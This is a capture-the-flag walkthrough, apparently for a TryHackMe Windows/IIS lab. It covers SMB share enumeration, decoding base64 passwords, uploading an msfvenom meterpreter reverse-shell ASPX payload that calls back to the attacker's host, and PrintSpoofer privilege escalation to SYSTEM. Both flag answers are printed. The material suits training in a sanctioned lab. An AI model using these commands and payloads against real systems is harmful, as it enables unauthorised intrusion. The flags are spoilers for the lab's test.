[Pre-Engagement Briefing]

[*] Target: 10.10.192.237

[Question 1] User Flag => THM{fdk4ka34vk346ksxfr21tg789ktf45}

    [+] Using Wappalizer in the http://10.10.192.237/ => we know that 

        [1] Web frameworks is Microsoft ASP.NET

        [2] OS: Windows Server

        [3] Web Server: IIS 10.0

    # nmap 10.10.192.237 -A -sV --script=vuln,http-enum --disable-arp-ping -Pn -v -O -T 5 -p-

        Not shown: 995 filtered tcp ports (no-response)
        PORT     STATE SERVICE       VERSION
        80/tcp   open  http          Microsoft IIS httpd 10.0
        |_http-server-header: Microsoft-IIS/10.0
        |_http-dombased-xss: Couldn't find any DOM based XSS.
        |_http-csrf: Couldn't find any CSRF vulnerabilities.
        |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
        135/tcp  open  msrpc         Microsoft Windows RPC
        139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
        445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
        3389/tcp open  ms-wbt-server Microsoft Terminal Services
        49663/tcp open  http          Microsoft IIS httpd 10.0
        49667/tcp open  msrpc         Microsoft Windows RPC
        49669/tcp open  msrpc         Microsoft Windows RPC
        ...
        Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

    [+] I already tried to perform directory brute forcing, using remmina ..etc..etc.. but don't have any result

        [>>] Voila:

            smbclient -L //10.10.192.237

            [?] -L: option instructs smbclient to retrieve the list of shares without actually connecting to them

            Password for [WORKGROUP\bigbox]:

                    Sharename       Type      Comment
                    ---------       ----      -------
                    ADMIN$          Disk      Remote Admin
                    C$              Disk      Default share
                    IPC$            IPC       Remote IPC
                    nt4wrksv        Disk      
            Reconnecting with SMB1 for workgroup listing.
            do_connect: Connection to 10.10.192.237 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
            Unable to connect with SMB1 -- no workgroup available

                [>>] smbclient //10.10.192.237/nt4wrksv 
                        
                        Password for [WORKGROUP\bigbox]:
                        Try "help" to get a list of possible commands.
                        smb: \> ls
                        .                                   D        0  Sun Jul 26 05:46:04 2020
                        ..                                  D        0  Sun Jul 26 05:46:04 2020
                        passwords.txt                       A       98  Sat Jul 25 23:15:33 2020

                                        7735807 blocks of size 4096. 5137725 blocks available

                [>>] $ cat passwords.txt
                     [User Passwords - Encoded]
                     Qm9iIC0gIVBAJCRXMHJEITEyMw== 
                     QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                                                                                           

                    <=> Bob - !P@$$W0rD!123

                    <=> Bill - Juw4nnaM4n420696969!$$$

                [Note] Okay! I can't connect to the RDP even with this credential

    [+] Okay we have another http port right, let's see

        [>>] http://10.10.192.237:49663/ => just the same website as on port 80

             But it has one thing that 80's doesn't => http://10.10.192.237:49663/nt4wrksv/passwords.txt 

             [User Passwords - Encoded]
             Qm9iIC0gIVBAJCRXMHJEITEyMw==
             QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

        [>>] I know what you are thinking about "File Upload vulnerability"

            # msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.14.56.1 LPORT=1234 -f aspx >> malware.aspx

                [Note] The file with the ASPX extension is an Active Server Page Extended file designed for Microsoft's ASP.NET framework.

                smb: \> put malware.aspx
                putting file malware.aspx as \malware.aspx (367.4 kb/s) (average 317.8 kb/s)

                smb: \> ls
                .                                   D        0  Thu Jul 13 11:48:34 2023
                ..                                  D        0  Thu Jul 13 11:48:34 2023
                malware.aspx                        A  1015029  Thu Jul 13 11:48:37 2023
                passwords.txt                       A       98  Sat Jul 25 23:15:33 2020

        [>>] http://10.10.192.237:49663/nt4wrksv/malware.aspx

                msf6 exploit(multi/handler) > set LHOST 10.14.56.1
                LHOST => 10.14.56.1

                msf6 exploit(multi/handler) > set LPORT 1234
                LPORT => 1234

                msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
                payload => windows/x64/meterpreter_reverse_tcp

                msf6 exploit(multi/handler) > run

                [*] Started reverse TCP handler on 10.14.56.1:1234 
                [*] Meterpreter session 1 opened (10.14.56.1:1234 -> 10.10.16.254:49740) at 2023-07-13 11:52:33 +0800
                [*] Meterpreter session 2 opened (10.14.56.1:1234 -> 10.10.16.254:49741) at 2023-07-13 11:52:33 +0800

                    meterpreter > cd C:\\Users

                    meterpreter > ls

                    Listing: C:\Users
                    =================

                    Mode              Size  Type  Last modified              Name
                    ----              ----  ----  -------------              ----
                    040777/rwxrwxrwx  8192  dir   2020-07-25 23:05:52 +0800  .NET v4.5
                    040777/rwxrwxrwx  8192  dir   2020-07-25 23:05:49 +0800  .NET v4.5 Classic
                    040777/rwxrwxrwx  8192  dir   2020-07-26 01:30:12 +0800  Administrator
                    040777/rwxrwxrwx  0     dir   2016-07-16 21:34:35 +0800  All Users
                    040777/rwxrwxrwx  0     dir   2020-07-26 05:03:44 +0800  Bob
                    040555/r-xr-xr-x  8192  dir   2020-07-26 01:55:45 +0800  Default
                    040777/rwxrwxrwx  0     dir   2016-07-16 21:34:35 +0800  Default User
                    040555/r-xr-xr-x  4096  dir   2020-07-25 22:58:09 +0800  Public
                    100666/rw-rw-rw-  174   fil   2016-07-16 21:21:29 +0800  desktop.ini

                    meterpreter > cd Bob

                    meterpreter > cd Desktop

                    meterpreter > ls
                    Listing: C:\Users\Bob\Desktop
                    =============================

                    Mode              Size  Type  Last modified              Name
                    ----              ----  ----  -------------              ----
                    100666/rw-rw-rw-  35    fil   2020-07-25 23:24:43 +0800  user.txt

                    meterpreter > cat user.txt
                    THM{fdk4ka34vk346ksxfr21tg789ktf45}

[Question 2] Root Flag => THM{1fk5kf469devly1gl320zafgl345pv}

    [+] First thing first, check priv

    C:\>whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                               State   
    ============================= ========================================= ========
    SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
    SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
    SeAuditPrivilege              Generate security audits                  Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege       Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

    => I think if you guys completed the Alfred lab, the first thing you focus on will be 'SeImpersonatePrivilege' , I must say that 'Impersonate' is something that really impressive

    => Ofcourse to do the next step I already tried WinPEAS, PowerUp, searching for CVE like SysTracingPOC, COMahawk .... but some of them are too old and can't be used in this situation

    => But PrintSpoofer.exe or GodPotato, they worked 

        C:\Users\Bob\Desktop>dir
    
        Volume in drive C has no label.
        Volume Serial Number is AC3C-5CB5

        Directory of C:\Users\Bob\Desktop

        07/13/2023  03:32 AM    <DIR>          .
        07/13/2023  03:32 AM    <DIR>          ..
        07/13/2023  03:24 AM            57,344 GodPotato-NET2.exe
        07/13/2023  03:32 AM            27,136 PrintSpoofer.exe
        07/13/2023  03:17 AM           679,936 rottenpotato.exe
        07/13/2023  03:31 AM            73,802 test.exe
        07/25/2020  08:24 AM                35 user.txt
                    5 File(s)        838,253 bytes
                    2 Dir(s)  21,047,054,336 bytes free

        C:\Users\Bob\Desktop>.\PrintSpoofer.exe -i -c cmd
        .\PrintSpoofer.exe -i -c cmd
        [+] Found privilege: SeImpersonatePrivilege
        [+] Named pipe listening...
        [+] CreateProcessAsUser() OK
        Microsoft Windows [Version 10.0.14393]
        (c) 2016 Microsoft Corporation. All rights reserved.
        ...
        C:\Windows\system32>cd C:\Users\Administrator\Desktop
        cd C:\Users\Administrator\Desktop

        C:\Users\Administrator\Desktop>dir

        Volume in drive C has no label.
        Volume Serial Number is AC3C-5CB5

        Directory of C:\Users\Administrator\Desktop

        07/25/2020  08:24 AM    <DIR>          .
        07/25/2020  08:24 AM    <DIR>          ..
        07/25/2020  08:25 AM                35 root.txt
                    1 File(s)             35 bytes
                    2 Dir(s)  21,047,377,920 bytes free

        C:\Users\Administrator\Desktop>type root.txt

        THM{1fk5kf469devly1gl320zafgl345pv}

    [Note] Link: https://github.com/dievus/printspoofer